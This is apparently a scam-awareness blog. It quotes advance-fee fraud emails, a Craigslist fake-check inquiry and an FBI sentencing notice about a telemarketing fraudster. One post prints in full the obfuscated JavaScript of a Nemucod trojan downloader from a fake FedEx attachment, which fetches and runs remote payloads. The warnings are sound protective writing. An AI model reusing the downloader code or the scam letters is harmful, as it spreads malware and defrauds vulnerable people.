Two Scams Today: Be Careful Out There.

Scam 1: Benin Fraud

Seems that Benin is rapidly replacing Nigeria as the source of these scam letters.

Subject: Attn Please!
From: McAllen-Miller <wudept5@gmail.com>
To: undisclosed-recipients:;

Attn Please,

I am commissioner McAllen-Miller the director of international airport Texas United States. Due to the illegal operations of fraudsters in this country America our council with the united Nation forum has established to help you and other scam victims recover your funds and consignments boxes here in America. So far now, we have recovered 100 consignment boxes abandoned in our airport ware house and an other 50 consignment boxes apprehended from illegal fake diplomats.

Due to the petitions received by the formal UN boss secretary general-general Kofi Annan from all over the continent in regards to the fraudulent activities going on in America sub-region with the Security’s agent and diplomats who has been delaying people’s funds and gold hold, consignments and valuables in their custody are demand to be releases to their owners.

I am commissioner McAllen-Miller the director of international airport Texas, McAllen-Miller commissioner of international airport Texas United States for peace keeping, appointed by the new government of (NDC) president professor Vickie Sutton, I have included Your name into the beneficiary files of scam victims for release of 2 consignment boxes valuable of $95million us dollars and 85kilograms of gold deliver to you from the cargo department of the united nation diplomatic courier service here in 100 South International Boulevard Progreso, TX 78579 United State.

The $95 Million is from the UN compensation/bailout funds for citizens of UN member countries and citizens of commonwealth Nations for Poverty alleviation during this economic crunch and recession. The sum of $7 trillion was shared amongst 215 companies and individuals. You were awarded the fund for investment to ease the economic crunch and to be profitable and help others in need as a measure to ease the present economic hardship.

So according to our agreement with the United Nations including the origin of your fund in Benin Republic all our communications should be on email for record purpose so you are advice to follow the instruction immediately for your own good and future.

You are therefore advice to submit all your information for onward delivery of your 2 register Consignment boxes deliver to you.

Passport id.
Full name.
Home or office address.
Direct telephone number/mobile number.
Fax number.
Country of origin.

Please kindly note the below important registration details of your
(2) consignment boxes

The registration no………………………. gil/am/xxx21/0x
The batch number of the boxes……………….gil/ am/xxx54/0x
Security code number…………………… ..sfss/am942054/02
Serial no………………………. …..0043687/eb.

You are advise to act fast in receipt of this email to you and any further delay will be the pleasure of the Unhrc to use your fund to help the displaced people in Darfur and you are also advice to stop any illegal transaction because we have place our net working on you in any transaction you may likely participant on.

For further negotiation to enhance the completion of this transaction, you will contact the united Nation diplomatic base (U.N.D.B) for delivery of your 2 consignment boxes to you after you complete the payment of $80 us dollars for the endorsement fees for the signatory of the Texas international airport Authority . a NOTE YOU ARE ADVICE TO DIRECT THE FEE TO BENIN AS ORIGINATED OF YOUR BOXES VIA WESTERN UNION OR MONEY GRAM.

Receiver’s name: JULIUS CHUKUWMA
COUNTRY: BENIN REPUBLIC
CITY: COTONOU
TEXT QUESTION:URGENT
ANSWER: TODAY
AMOUNT $80.00 USD.

Best regards.

Commissioner McAllen-Miller
The director of international airport TX.

No, Julius, I don’t think I’ll be sending you any money today. Just go ahead and claim those boxes for yourself, and feel free to spend all the money they contain:

images

Scam 2: Craigslist scammer

I have about ten items up on Craigslist – here’s an inquiry (which was full of red flags, but I answered anyway, just in case it was an honest buyer.

Sorry, I just saw your Cl Post now. how much are you willing to sell it last, but will like to meet with you in person first before payment,will that be possible? As far as meeting goes,Today and tomorrow works. I’ll be available by 4-5ish…if that works for you? contact through, ernestinecuttercbo@yahoo.com  n let me know if you wanna set up day n time to meet,.please let me know whether or not you’d like me to come by today or tomorrow… thanks so much!
The English is typically Nigerian-scammerese, but I answered:
To: ernestinecuttercbo@yahoo.com
Subject: Craigslist response
I saw your answer via email about the [item]. Where are you located?
I would be able to meet today if that works for you.
Back comes the response, almost immediately – from a different email address:

Hello! let’s do like this, actually now I’m not in town for now, I came to visit my son so I wont be able to meet with you but am ok with the condition as seen on the advert, I’ll proceed in issuing a Check out to you and when you received the check, I will make arrangement for pick-up. So get back to me with below details asap.

Name:
Address:
City:
State:
Postal Code:
Phone Number:
Last Asking Price:

And as soon as this is provided, the payment will be overnight to you and I will let you know when its mailed out. I need you to be honest with the sale as I am a God fearing person

** N.B UPS does not deliver to P.O box addresses.

Sincerely,

That check, of course, would be bogus – and for a lot more money than I was asking for the item, like this one:

Ben Carson Bogus Check 2

All I would have to do is deduct my sale price and send the rest to the scumbag’s “shipping agent.”

Naturally, the drone didn’t even bother to read the advert, or he would have seen this:

Cash-only sale, no shipping agents, PayPal or Western Union money transfers.

I sent my prospective buyer a letter full of implications about his parentage and suggesting a few choice anatomical exercises.

These people frost my chops – and far, far too many are taken advantage of. Please talk to your loved ones who are using local classified boards or Craigslist, and show them that they are at risk to be scammed if they are not careful.

38_021022_nigerianemailmain.jpg.CROP.original-original

The Old Wolf has spoken.

Again: Don’t click on email attachments from unknown people.

This cannot be stressed enough: Don’t click on email attachments from unknown people.

Edit: Friends have pointed out that it’s best to be wary of attachments appearing to be from people you know, if you aren’t expecting one. Contact lists can be stolen and people impersonated.

pc-trojan

Yesterday this email showed up in my inbox:

To: [edited]
Subject: We could not deliver your parcel, #00576180
From: “FedEx International Ground” <allan.horton@web2.pnet.xcon.it>

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Delivery Label is attached to this email.

Sincerely,
Allan Horton,
Operation Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.

Attached to the email was a file called “FedEx_ID_00576180.zip.”

Curious as ever, in an isolated environment I unpacked the zip file, and the result was immediately flagged and quarantined by Microsoft Security Essentials as containing the file “FedEx_ID_00576180.doc.js,” which contained “TrojanDownloader:JS/Nemucod.F

What that means is that this is a javascript file containing executable code which would go out to the internet and download horrible things onto your computer – adware, keyloggers, botnet software, or even never-sufficiently-to-be-damned ransomware like Cryptolocker which could encrypt all your files and demand hundreds of dollars for a decryption key.

When I examined the file contents, it looked like this:

function hhhhhhhhhhhhhhh(){ccccc += ‘+”‘; jjjjjjjjjjjjjjj(); };  function iiiiiiiiiiiiiiii(){ccccc += ‘ction'; tttttttttttttt(); };  function ggggggggggggggg(){ccccc += ‘e();'; xxxxxxxxx(); };  function fffffff(){ccccc += ‘= w'; llllll(); };  function yyyyyyyyyyyyyyyy(){ccccc += ‘new ‘; wwwwwwwwwwwwwwww(); };  function gggggggggggggggg(){ccccc += ‘(“WS'; qqqqqqqqqqqqq(); };  function zzzzzzzzzzzz(){ccccc += ‘t.php'; llllllllllllll(); };…

In other words, it looked like garbage. Refuse. Filth. Muck. Boo! Boo! Booooooo! But when I massaged the file a little, putting each “function” call on a new line, this is what came out:

function hhhhhhhhhhhhhhh(){ccccc += ‘+”‘; jjjjjjjjjjjjjjj(); };
function iiiiiiiiiiiiiiii(){ccccc += ‘ction'; tttttttttttttt(); };
function ggggggggggggggg(){ccccc += ‘e();'; xxxxxxxxx(); };
function fffffff(){ccccc += ‘= w'; llllll(); };
function yyyyyyyyyyyyyyyy(){ccccc += ‘new ‘; wwwwwwwwwwwwwwww(); };
function gggggggggggggggg(){ccccc += ‘(“WS'; qqqqqqqqqqqqq(); };
function zzzzzzzzzzzz(){ccccc += ‘t.php'; llllllllllllll(); };
function jjjjjjjj(){ccccc += ‘dys'; zzzzzzzz(); };
function pppppppppp(){ccccc += ‘dl(51′; llllllll(); };
function xxxxxxxxxxxx(){ccccc += ‘ xa'; hhhhhhhhhhhhhh(); };
function ssssssssssss(){xx += ‘a'; ccccc += ‘n ‘; gggggggggg(); };
function wwwwwwwwwww(){ccccc += ‘de(92′; ssssssssssssssss(); };
function bbbbbbbbb(){ccccc += ‘bluee'; jjjjjjjjj(); };
function qqqqqqqqqqqqqq(){ccccc += ’00′; iiiiiiiiii(); };
function eeeeeeeee(){ccccc += ‘iv'; wwwwwwww(); };
function eeeeeeeeee(){ccccc += ‘ySt'; ggggggg(); };
function vvvvvvvvvvvvvv(){ccccc += ‘o.sta'; wwwwwww(); };
function pppppppppppppppp(){ccccc += ‘; ‘; aaaaaaaaaaaaa(); };
function ddddddddddddddd(){ccccc += ‘) ‘; ppppppp(); };
function dddddddddd(){ccccc += ‘ct'; ssssssssssssss(); };
function pppppp(){ccccc += ‘arCo'; wwwwwwwwwww(); };
function xxxxxxxxxxxxxx(){ccccc += ‘ze'; aaaaaaaaaa(); };
function iiiiiii(){ccccc += ‘ength'; gggggggggggg(); };
function yyyyyy(){ccccc += ‘r xo ‘; cccccccc(); };
function pppppppppppppp(){ccccc += ‘a.p'; mmmmmmm(); };
function uuuuuuuuuuu(){ccccc += ‘ariau'; iiiiiiiiiiiiiiii(); };
function ggggggggggg(){ccccc += ‘y)'; pppppppppppppppp(); };
function pppppppppppp(){ccccc += ‘E0707′; qqqqqqqqqqqqqq(); };
function nnnnnn(){ccccc += ‘.nidh'; nnnnnnnnnnnnnnnn(); };
function jjjjjjjjjjj(){ccccc += ‘0B'; eeeeeeeeeeeeeeee(); };
function fffffffffffffff(){ccccc += ‘ound'; hhhhhhhhhh(); };
function mmmmmmmmmmmmmm(){ccccc += ‘ry'; mmmmmmmm(); };
function lllllllllll(){ccccc += ‘ A'; dddddddddd(); };
function xxxxxxxxxx(){ccccc += ‘ }; ‘; ggggggggg(); };
function llllllllllllll(){ccccc += ‘?r'; ddddddddddd(); };
function ccccccccc(){ccccc += ‘A01′; oooooo(); };
function zzzzzzzzzzzzzzzz(){ccccc += ‘xe”; ‘; rrrrrrrrrrrr(); };
function ttttttttttttttt(){ccccc += ‘SXML2′; jjjjjjjjjjjj(); };
function xxxxxxxxxxxxx(){ccccc += ‘} cat'; ccccccccccccc(); };
function jjjjjjjjj(){ccccc += ‘cho'; hhhhhhh(); };
function qqqqqqqq(){ccccc += ‘ct'; nnnnnnnnnnnnnn(); };
function zzzzzzzzzzz(){ccccc += ‘050A2′; rrrrrrrr(); };
function vvvvvvvvvvvvv(){ccccc += ‘dn ‘; lllllllll(); };
function nnnnnnnn(){ccccc += ‘ } ‘; hhhhhhhhhhhhhhhh(); };
function aaaaaaaaaaaa(){ccccc += ‘xo.op'; kkkkkkkkkkk(); };
function sssssssssssss(){ccccc += ‘ (xa'; xxxxxxxx(); };
function hhhhhhhhhhh(){ccccc += ‘ xa.'; qqqqqqqqqqqqqqqq(); };
function wwwwwwww(){ccccc += ‘eX'; ddddddddddddd(); };
function kkkkkkk(){xx += ‘v'; ccccc += ‘tio'; ssssssssssss(); };
function uuuuuuuuuuuuuuuu(){ccccc += ‘eXObj'; bbbbbbbbbb(); };
function ggggggg(){ccccc += ‘ate'; zzzzzzzzzzzzz(); };
function ffffffffffffff(){ccccc += ‘”&id'; ddddddd(); };
function rrrrrrrr(){ccccc += ‘407’; jjjjjjjjjjj(); };
function vvvvvvvv(){ccccc += ‘.read'; eeeeeeeeee(); };
function zzzzzzzzz(){ccccc += ‘515’; pppppppppppp(); };
function sssssssssss(){ccccc += ‘ndom(‘; iiiiiiiiiiii(); };
function cccccccccccc(){ccccc += ‘ent'; bbbbbbbbbbbbbbbb(); };
function rrrrrrrrrr(){ccccc += ‘en()'; sssssss(); };
function iiiiiiiiiiii(){ccccc += ‘)*100′; dddddddddddd(); };
function kkkkkkkkkk(){ccccc += ‘ A'; qqqqqqqq(); };
function qqqqqqqqqqqq(){ccccc += ‘%TEMP'; aaaaaaaa(); };
function mmmmmmmmmmmmm(){ccccc += ‘ct(“M'; ttttttttttttttt(); };
function ccccccc(){ccccc += ‘”h'; rrrrrrrrrrrrrr(); };
function sssssssss(){ccccc += ‘= 1)'; xxxxxxxxxxxxxxx(); };
function cccccccccc(){ccccc += ‘e(xo'; bbbbbbbb(); };
function rrrrrrrrrrrrrrr(){ccccc += ‘ ='; ffffffffffff(); };
function rrrrrrrrrrrr(){ccccc += ‘var'; lllllllllllll(); };
function xxxxxxxx(){ccccc += ‘.si'; xxxxxxxxxxxxxx(); };
function ggggggggggggg(){ccccc += ‘104A0′; ccccccccc(); };
function mmmmmmmmmm(){ccccc += ‘= 1; ‘; kkkkkkkkkkkkk(); };
function bbbbbbbbbbbbbbb(){ccccc += ‘ b'; rrrrrrrrrrrrrrr(); };
function wwwwwww(){ccccc += ‘tu'; tttttttttttt(); };
function sssssss(){ccccc += ‘; xa.'; uuuuuu(); };
function lllllllll(){ccccc += ‘= 1;'; qqqqqqqqqq(); };
function llllll(){ccccc += ‘s.'; ttttttttttt(); };
function rrrrrrrrrrrrrrrr(){ccccc += ‘ar ‘; ssssss(); };
function uuuuuuuuuuuuuuu(){ccccc += ‘ngs'; nnnnnnn(); };
function gggggggggggg(){ccccc += ‘; ‘; lllllll(); };
function fffffffff(){ccccc += ‘r+'; ffffffffffffff(); };
function jjjjjjjjjjjjjjj(){ccccc += ‘.e'; zzzzzzzzzzzzzzzz(); };
function dddddd(){ccccc += ‘ech'; qqqqqq(); };
function eeeeeeee(){ccccc += ‘&& x'; vvvvvvvvvvvvvv(); };
function uuuuuuuu(){xx += ‘e'; ccccc += ‘func'; kkkkkkk(); };
function aaaaaaaaaaaaaa(){ccccc += ‘[i]'; uuuuuuuuuuuuuu(); };
function qqqqqqqqqqqqqqq(){ccccc += ‘o.sen'; wwwwwwwwwwwwww(); };
function ssssssssss(){ccccc += ‘; for'; llllllllllllllll(); };
function lllllllllllll(){ccccc += ‘ dn ‘; dddddddddddddd(); };
function aaaaaaaaaaaaaaa(){ccccc += ‘.Ru'; ccccccccccccccc(); };
function ppppppp(){ccccc += ‘{ va'; qqqqqqqqq(); };
function rrrrrrrrr(){ccccc += ‘r ws ‘; llllllllllll(); };
function bbbbbbbb(){ccccc += ‘.Resp'; mmmmmmmmm(); };
function jjjjjjjjjjjjjj(){ccccc += ‘pt.S'; aaaaaaaaaaaaaaaa(); };
function cccccccccccccc(){ccccc += ‘000’; uuuuuuuuuuuuu(); };
function cccccccccccccccc(){ccccc += ‘it'; bbbbbbbbbbbbb(); };
function xxxxxx(){ccccc += ‘);'; bbbbbbbbbbbb(); };
function ssssss(){ccccc += ‘i=0;'; yyyyyyyyyyyyy(); };
function yyyyyyyyyyyyyyy() { this[xx](ccccc); };
function llllllllllllllll(){ccccc += ‘ (v'; rrrrrrrrrrrrrrrr(); };
function iiiiii(){ccccc += ‘)+S'; hhhhhh(); };
function eeeeeeeeeeee(){ccccc += ‘od'; ggggggggggg(); };
function ccccccccccc(){ccccc += ‘h.r'; fffffffffffffff(); };
function zzzzzz(){ccccc += ‘}; ‘; llllllllll(); };
function aaaaaaaaaaaaaaaa(){ccccc += ‘hell'; pppppppp(); };
function gggggggg(){ccccc += ‘0;'; bbbbbbbbbbbbbb(); };
function hhhhhhhh(){ccccc += ‘B.S'; bbbbbbb(); };
function pppppppp(){ccccc += ‘”); v'; kkkkkkkkkkkkkk(); };
function wwwwwwwwwwwww(){ccccc += ‘nd'; jjjjjjjjjj(); };
function iiiiiiiiii(){ccccc += ’01′; sssssssssssssss(); };
function gggggggggg(){xx += ‘l'; ccccc += ‘dl(fr'; kkkkkkkk(); };
function nnnnnnn(){ccccc += ‘(“‘; qqqqqqqqqqqq(); };
function vvvvvvvvvvvvvvv(){ccccc += ‘oF'; yyyyyyyyy(); };
function iiiiiiii(){ccccc += ‘.f'; ttttttttttttt(); };
function jjjjjj(){ccccc += ‘} }; ‘; pppppppppp(); };
function wwwwwwwwww(){ccccc += ‘om”‘; jjjjjjjjjjjjjjjj(); };
function mmmmmmmm(){ccccc += ‘ { ws'; aaaaaaaaaaaaaaa(); };
function oooooooooooooo(){ccccc += ‘m”);'; hhhhhhhhhhh(); };
function ggggggggg(){ccccc += ‘try'; iiiiiiiiiii(); };
function vvvvvvvvv(){ccccc += ‘en'; zzzzzzzzzzzz(); };
function hhhhhh(){ccccc += ‘tring'; iiiiiiii(); };
function mmmmmmm(){ccccc += ‘ositi'; ttttttttt(); };
function eeeeeeeeeeeeeee(){ccccc += ‘ct'; gggggggggggggggg(); };
function qqqqqqqqqqqqqqqq(){ccccc += ‘op'; rrrrrrrrrr(); };
function ttttttttttttt(){ccccc += ‘ro'; ppppppppppp(); };
function nnnnnnnnn(){ccccc += ‘/”+b'; aaaaaaaaaaaaaa(); };
function hhhhhhh(){ccccc += ‘stud'; yyyyyyyyyyyyyy(); };
function eeeeeeeeeeeeee(){ccccc += ‘; ‘; jjjjjj(); };
function tttttttt(){ccccc += ‘reak'; eeeeeeeeeeeeee(); };
function jjjjjjjjjjjjj(){ccccc += ‘ (dn'; aaaaaaa(); };
function eeeeee(){ccccc += ‘a = n'; iiiiiiiiiiiiiii(); };
function vvvvvvvvvvvv(){ccccc += ‘};'; xxxxxxxxxxxx(); };
function zzzzzzz(){ccccc += ‘”AD'; ddddddddd(); };
function zzzzzzzzzz(){ccccc += ‘n ‘; fffffff(); };
function aaaaaaaa(){ccccc += ‘%”‘; iiiiii(); };
function hhhhhhhhhhhhhh(){ccccc += ‘.clos'; ggggggggggggggg(); };
function yyyyyyyyyyyyy(){ccccc += ‘ i'; fffffffffffff(); };
function eeeeeeeeeeeee(){ccccc += ‘f (xo'; vvvvvvvv(); };
function uuuuuuuuu(){ccccc += ‘ { i'; eeeeeeeeeeeee(); };
function qqqqqqqqqq(){ccccc += ‘ x'; pppppppppppppp(); };
function oooooooooo(){ccccc += ‘je'; mmmmmmmmmmmmm(); };
function iiiiiiiiiii(){ccccc += ‘ { ‘; aaaaaaaaaaaa(); };
function nnnnnnnnnn(){ccccc += ‘dl(20′; ffffffffff(); };
function aaaaaaaaa(){ccccc += ’00)'; hhhhhhhhhhhhhhh(); };
function hhhhhhhhhhhhhhhh(){ccccc += ‘catc'; ssssssss(); };
function kkkkkkkkk(){ccccc += ‘fn,1′; kkkkkk(); };
function nnnnnnnnnnnnnnnn(){ccccc += ‘og'; nnnnnnnnnnnnn(); };
function ffffff(){ccccc += ‘TTP”‘; xxxxxx(); };
function ooooooooooo(){ccccc += ‘lit'; hhhhhhhhh(); };
function mmmmmm(){ccccc += ‘= 0; ‘; iiiiiiiiiiiii(); };
function nnnnnnnnnnnnnn(){ccccc += ‘iv'; uuuuuuuuuuuuuuuu(); };
function bbbbbbbbbb(){ccccc += ‘ect(‘; zzzzzzz(); };
function hhhhhhhhhh(){ccccc += ‘(Ma'; xxxxxxxxxxxxxxxx(); };
function ssssssss(){ccccc += ‘h (e'; ppppppppp(); };
function nnnnnnnnnnnnn(){ccccc += ‘.com ‘; bbbbbbbbb(); };
function kkkkkkkkkkkkk(){ccccc += ‘xa.wr'; mmmmmmmmmmmm(); };
function oooooo(){ccccc += ’10″‘; rrrrrrr(); };
function aaaaaaa(){ccccc += ‘ ='; sssssssss(); };
function ssssssssssssssss(){ccccc += ‘)+Mat'; ccccccccccc(); };
function kkkkkkkkkkkkkkk(){ccccc += ‘.c'; wwwwwwwwww(); };
function ddddddddd(){ccccc += ‘OD'; hhhhhhhh(); };
function iiiiiiiii(){ccccc += ‘”+f'; fffffffff(); };
function eeeeeeeeeeeeeeee(){ccccc += ‘09070’; hhhhhhhhhhhh(); };
function xxxxxxxxxxxxxxx(){ccccc += ‘ b'; tttttttt(); };
function yyyyyyyy(){ccccc += ‘n,2)'; ffffffffffffffff(); };
function mmmmmmmmmmmm(){ccccc += ‘it'; cccccccccc(); };
function bbbbbbbbbbbb(){ccccc += ‘ xo.o'; wwwwwwwww(); };
function llllllll(){ccccc += ’41′; vvvvvv(); };
function vvvvvvvvvvv(){ccccc += ‘ri'; uuuuuuuuuuuuuuu(); };
function zzzzzzzzzzzzz(){ccccc += ‘ =='; aaaaaaaaaaa(); };
function hhhhhhhhhhhh(){ccccc += ‘517’; ggggggggggggg(); };
function tttttt(){ccccc += ‘r)'; ooooooo(); };
function ssssssssssssss(){ccccc += ‘ive'; dddddddddddddddd(); };
function fffffffffffff(){ccccc += ‘<b.l'; iiiiiii(); };
function qqqqqq(){ccccc += ‘ange ‘; nnnnnnnnnnnn(); };
function xxxxxxxxxxxxxxxx(){ccccc += ‘th.ra'; sssssssssss(); };
function qqqqqqqqqqqqq(){ccccc += ‘cri'; jjjjjjjjjjjjjj(); };
function ppppppppppp(){ccccc += ‘mCh'; pppppp(); };
function aaaaaaaaaa(){ccccc += ‘ > 5′; cccccccccccccc(); };
function ddddddd(){ccccc += ‘=545D'; zzzzzzzzz(); };
function jjjjjjjjjj(){ccccc += ‘Env'; yyyyyyyyyyy(); };
function aaaaaaaaaaaaa(){ccccc += ‘if'; sssssssssssss(); };
function iiiiiiiiiiiiiii(){ccccc += ‘ew'; kkkkkkkkkk(); };
function qqqqqqqqqqq(){ccccc += ‘; ‘; xxxxxxxxxxxxx(); };
function hhhhhhhhhhhhh(){ccccc += ‘lse)'; kkkkkkkkkkkk(); };
function nnnnnnnnnnnn(){ccccc += ‘= ‘; ooooooooooooo(); };
function dddddddddddddddd(){ccccc += ‘XObje'; eeeeeeeeeeeeeee(); };
function kkkkkkkk(){ccccc += ‘) { ‘; uuuuuuuuuu(); };
function ooooooooo(){ccccc += ‘200’; ddddddddddddddd(); };
function xxxxxxxxx(){ccccc += ‘ };'; xxxxxxxxxx(); };
function jjjjjjjjjjjjjjjj(){ccccc += ‘.sp'; ooooooooooo(); };
function kkkkkkkkkkkk(){ccccc += ‘; x'; qqqqqqqqqqqqqqq(); };
function kkkkkkkkkkkkkk(){ccccc += ‘ar f'; zzzzzzzzzz(); };
function jjjjjjjjjjjj(){ccccc += ‘.XMLH'; ffffff(); };
function zzzzzzzz(){ccccc += ‘tat'; dddddd(); };
function rrrrrrr(){ccccc += ‘ ,fa'; hhhhhhhhhhhhh(); };
function wwwwwwwww(){ccccc += ‘nrea'; jjjjjjjj(); };
function wwwwwwwwwwwwww(){ccccc += ‘d();'; nnnnnnnn(); };
function hhhhhhhhh(){ccccc += ‘(” “)'; ssssssssss(); };
function yyyyyyyyyyyyyy(){ccccc += ‘ios'; kkkkkkkkkkkkkkk(); };
function ppppppppp(){ccccc += ‘r) {‘; zzzzzz(); };
function bbbbbbbbbbbbbb(){ccccc += ‘ va'; yyyyyy(); };
function vvvvvvvvvvvvvvvv(){ccccc += ‘com p'; cccccccccccccccc(); };
function dddddddddddd(){ccccc += ‘0000’; aaaaaaaaa(); };
function lllllll(){ccccc += ‘i++)'; qqqqqqq(); };
function wwwwwwwwwwww(){ccccc += ‘ction'; oooooooooooooooo(); };
function zzzzzzzzzzzzzzz(){ccccc += ‘cum'; vvvvvvvvv(); };
function gggggg(){ccccc += ‘new'; lllllllllll(); };
function vvvvvv(){ccccc += ‘); ‘; nnnnnnnnnn(); };
function qqqqqqqqq(){ccccc += ‘r x'; eeeeee(); };
function ffffffffffff(){ccccc += ‘ “mun'; uuuuuuuuuuu(); };
function bbbbbbbbbbbbbbbb(){ccccc += ‘St'; vvvvvvvvvvv(); };
function ccccccccccccccc(){ccccc += ‘n(‘; kkkkkkkkk(); };
function qqqqqqq(){ccccc += ‘ { va'; rrrrrrrrr(); };
function kkkkkkkkkkk(){ccccc += ‘en(“‘; rrrrrr(); };
function ddddddddddd(){ccccc += ‘nd='; iiiiiiiii(); };
function ooooooooooooo(){ccccc += ‘fun'; wwwwwwwwwwww(); };
function llllllllll(){ccccc += ‘if'; jjjjjjjjjjjjj(); };
function uuuuuuuuuuuuu(){ccccc += ‘) { ‘; vvvvvvvvvvvvv(); };
function sssssssssssssss(){ccccc += ’17′; zzzzzzzzzzz(); };
function yyyyyyyyy(){ccccc += ‘ile(f'; yyyyyyyy(); };
function wwwwwwwwwwwwwwww(){ccccc += ‘Act'; eeeeeeeee(); };
function llllllllllll(){ccccc += ‘= ‘; gggggg(); };
function uuuuuu(){ccccc += ‘type ‘; mmmmmmmmmm(); };
function tttttttttttttt(){ccccc += ‘s.'; vvvvvvvvvvvvvvvv(); };
function mmmmmmmmm(){ccccc += ‘onseB'; eeeeeeeeeeee(); };
function dddddddddddddd(){ccccc += ‘= ‘; gggggggg(); };
function ttttttttt(){ccccc += ‘on ‘; mmmmmm(); };
function ttttttttttt(){ccccc += ‘Expa'; wwwwwwwwwwwww(); };
function tttttttttttt(){ccccc += ‘s == ‘; ooooooooo(); };
function uuuuuuuuuu(){ccccc += ‘var'; bbbbbbbbbbbbbbb(); };
function ffffffffff(){ccccc += ’52);'; yyyyyyyyyyyyyyy(); };
function ffffffffffffffff(){ccccc += ‘; t'; mmmmmmmmmmmmmm(); };
function bbbbbbbbbbbbb(){ccccc += ‘faa'; nnnnnn(); };
function yyyyyyyyyyy(){ccccc += ‘ironm'; cccccccccccc(); };
function ooooooo(){ccccc += ‘ {}; ‘; vvvvvvvvvvvv(); };
function oooooooooooooooo(){ccccc += ‘()'; uuuuuuuuu(); };
function ccccccccccccc(){ccccc += ‘ch (e'; tttttt(); };
function mmmmmmmmmmm(){ccccc += ‘aveT'; vvvvvvvvvvvvvvv(); };
function rrrrrr(){ccccc += ‘GET”,'; ccccccc(); };
function uuuuuuuuuuuuuu(){ccccc += ‘+”/do'; zzzzzzzzzzzzzzz(); };
function iiiiiiiiiiiii(){ccccc += ‘xa.s'; mmmmmmmmmmm(); };
function bbbbbbb(){ccccc += ‘trea'; oooooooooooooo(); };
function ddddddddddddd(){ccccc += ‘Ob'; oooooooooo(); };
function kkkkkk(){ccccc += ‘,0)'; qqqqqqqqqqq(); };
function cccccccc(){ccccc += ‘= ‘; yyyyyyyyyyyyyyyy(); };
function aaaaaaaaaaa(){ccccc += ‘ 4 ‘; eeeeeeee(); };
function rrrrrrrrrrrrrr(){ccccc += ‘ttp:/'; nnnnnnnnn(); }; var ccccc = ”; var xx = ”; uuuuuuuu();

By looking at the text elements in quotes (things like “ironm”, “ttp:/”, “.Ru”, etc. it’s pretty easy to see that the whole purpose of this script is to concatenate instructions which will lead your computer to some Russian website and infest your machine with code from Hell. I’m not skilled in Javascript (or, more accurately, it would take me more time than it’s worth to decrypt this script,) so suffice it to say you don’t want this on your machine.

The email looks like it’s from FedEx. Some poor computer-illiterate secretary, or your grandmother, or cousin, or someone who just used FedEx would probably think it was legitimate, download the file, unzip it, double-click on it, and Bob’s your uncle.

DON’T DO IT!

Attachments from people you don’t know, particularly .zip or .rar, are to be assiduously avoided. Trash them at once.

Please be vigilant and take good care of yourself and your loved ones.

The Old Wolf has spoken.

Sometimes the Good Guys Win

From the website of the Boston Division of the FBI (this is the real McCoy):

Canadian Sentenced to 10 Years in Prison for Role in Telemarketing Fraud

U.S. Attorney’s Office, November 10, 2010

BOSTON, MA—A Montreal man was sentenced today in federal court in connection with his role in a long running telemarketing scheme that targeted victims in the United States and the United Kingdom.

MITCHELL KARACHINSKY, 59, was sentenced by U.S. District Judge Patti B. Saris to 10 years’ imprisonment, to be followed by two years of supervised release. The court also ordered Karachinsky to pay restitution in the total amount of $1.624,750. Karachinsky pleaded guilty to telemarketing fraud on April 1, 2010.

At the earlier plea hearing, the prosecutor told the court that had the case proceeded to trial, the government’s evidence would have proven that Karachinsky participated in a fraudulent telemarketing ring operated from Montreal. Targeting elderly victims in the U.S., Karachinsky and others falsely represented that the call recipient had won a large money prize that could only be collected after the victim prepaid fees that needed to be mailed or wired to Canada. The money prizes were nonexistent and none of the victims of the scheme ever received any winnings. In total the scheme defrauded U.S. victims of more than $2.5 million. In December 2009 one of Karachinsky’s co-defendant, Gilles Maisonneuve, was also sentenced to 10 years in prison for his role in this fraud.

United States Attorney Carmen M. Ortiz said, “Telemarketing fraud is a crime that targets members of some of our most vulnerable populations, including senior citizens. I am committed to the prosecution of these predators and dedicated to recovering as much money for victims of telemarketing fraud as possible.”

U.S. Attorney Ortiz and Richard DesLauriers, Special Agent in Charge of the Federal Bureau of Investigation Federal Bureau of Investigation announced the sentencing today. The case was investigated by Project Colt, a cross border law enforcement telemarketing initiative based in Montreal including the participation of the FBI and other federal agencies and the Royal Canadian Mounted Police. It was prosecuted by Assistant U.S. Attorney Lori J. Holik of Ortiz’s Economic Crimes Unit.

I don’t mind doxxing this scumbag because the information presented here is a matter of public record, and this is the turdcasket who scammed my mother out of about $65,000.00 while she was still alive.

Ever since he was sentenced, we’ve been getting regular updates from the USDOJ Victim Notification system; the last one we got is as follows:

You have requested to receive notifications regarding MITCHELL KARACHINSKI, an inmate incarcerated at the Rivers Correctional Institution in Winton, NC. [snip] This notice is to inform you that MITCHELL KARACHINSKI will be released on April 22, 2015. Additionally, will release to the custody of US Immigration and Customs Enforcement for possible deporation to Canada.

So it looks like Mr. Scumbag has served his time and is about to be released, with the hope that ICE sends his sorry ass back to Montreal where, it is to be hoped, he will face additional sanctions from the Canadian authorities.

The notification mentions restitution, but Mogg only knows where any funds for that would come from. At any rate, I am most grateful to the FBI and the RCMP for working together to put this piece of camel ejecta and his cronies behind bars for a goodly bit of time.

The Old Wolf has spoken.

Am I (DEAD) or am I (ALIVE)? [Scam]

This Sam Nwa guy is working hard. A pity he doesn’t care to do anything but run an advance-fee fraud scam.

Subject: DHL COURIER SERVICE IMMEDIATE DELIVERY NOTIFICATION
From: Linda Williams <sarahkahls@gmail.com>
To: undisclosed-recipients:;

DIRECTOR DHL COURIER SERVICE.

TEL: +229 99935738

Dear Beneficiary,

I am writing to confirm the fact if you are (DEAD) or (ALIVE) and failure to reply back in the next 24hrs simply means what Mr Jude Betsy said was right that you are dead. Mr Jude Betsy has agreed to pay the needed charge fee valued of $50.00 dollars required for the Bond Stamp Duty Fee of your consignment box , but we have not gotten the money from him yet as we want to find out if you are DEAD or not, so if you are still (ALIVE) you are advice in your own best interest to reply back, The only money you will pay to our office here is just $50.00 for the paper works, Take note of this now, so we can stop further communication with Mr Jude Betsy and deliver the (Consignment Box) to your door step being the original benefactor of the $2.5 Million US Dollars. Be the reassurance that once we hear from you with this payment, i promise that your delivery will commence immediately without any further delay to hand over the consignment box to your designated address and do not miss this Good opportunity that you have to receive the consignment box at last for the pass effort that you are trying to get it receive to your home address this is an opportunity for you don’ t miss it is for you.

BELOW IS THE PAYMENT INFORMATION YOU WILL USE TO SEND THE $50.00 TO OUR CASHIER NAME THROUGH WESTERN UNION OR MONEY GRAM.

Receivers Name= = = Sam Nwa
Address:= = 12/1 Midombo Expressway Cotonou-Benin
Country= = = = = = Benin Republic
City= = = = = = = =Cotonou
